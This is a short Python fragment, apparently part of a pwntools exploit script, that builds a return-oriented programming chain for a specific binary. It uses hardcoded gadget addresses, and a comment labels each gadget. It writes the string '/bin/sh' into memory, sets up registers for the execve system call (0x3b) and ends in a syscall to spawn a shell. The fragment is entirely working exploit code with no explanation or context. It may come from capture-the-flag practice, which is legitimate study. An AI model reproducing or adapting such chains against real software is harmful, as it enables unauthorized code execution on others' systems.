payload = p64(0x4c07c5)
#0x00000000004c07c5: pop rcx; idiv edi; ret 0; 
payload += p64(0x68662f6e69622f)+p64(0x4a2dfc)
# 0x4a2dfc: pop rax ; retf
payload += p64(0x4e601f)+p32(0x45503f)+p32(0x33)
# 0x45503f: add qword ptr [rax + 0x39], rcx ; retf
payload += p32(0x4a2dfc)+p32(0x33)
# 0x4a2dfc: pop rax ; retf
payload += p64(0x49b27b)+p32(0x429e3e)+p32(0x33)
# 0x0000000000429e3e: pop rsi; jmp rax; 
payload += p64(0x0)
# 0x49b27b: pop rdi ; retf
payload += p64(0x4e6058)+p32(0x4c08f2)+p32(0x33)
# 0x00000000004c08f2: pop rdx; ret; 
payload += p64(0x0)+p64(0x4a2dfc)
# 0x4a2dfc: pop rax ; retf
payload += p64(0x3b)+p32(0x4615ef)+p32(0x33)
# 0x00000000004615ef: syscall; 
payload += b''
